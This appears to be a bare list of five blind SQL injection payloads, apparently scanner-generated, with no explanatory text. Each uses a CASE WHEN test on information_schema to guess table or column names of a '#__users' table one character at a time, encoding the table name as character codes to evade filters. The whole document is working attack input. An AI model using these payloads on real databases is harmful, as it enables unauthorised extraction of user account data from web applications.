(CASE WHEN (CHAR(127)=SUBSTRING((SELECT name FROM CONCAT(35,95,95,117,115,101,114,115) LIMIT 0, 1),0,1)) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)



(CASE WHEN (CHAR(35)=SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name=CONCAT(35,95,95,117,115,101,114,115) LIMIT 0, 1),0,1)) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)


(CASE WHEN (CHAR(123)=SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name=CONCAT(35,95,95,117,115,101,114,115) LIMIT 1, 1),1,1)) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)



(CASE WHEN (CHAR(127)=SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name=CONCAT(CHAR(35),CHAR(95),CHAR(95),CHAR(117),CHAR(115),CHAR(101),CHAR(114),CHAR(115)) LIMIT 1, 1),1,1)) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)



(CASE WHEN (CHAR(41)=SUBSTRING((SELECT name FROM CONCAT(CHAR(35),CHAR(95),CHAR(95),CHAR(117),CHAR(115),CHAR(101),CHAR(114),CHAR(115)) LIMIT 1, 1),1,1)) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)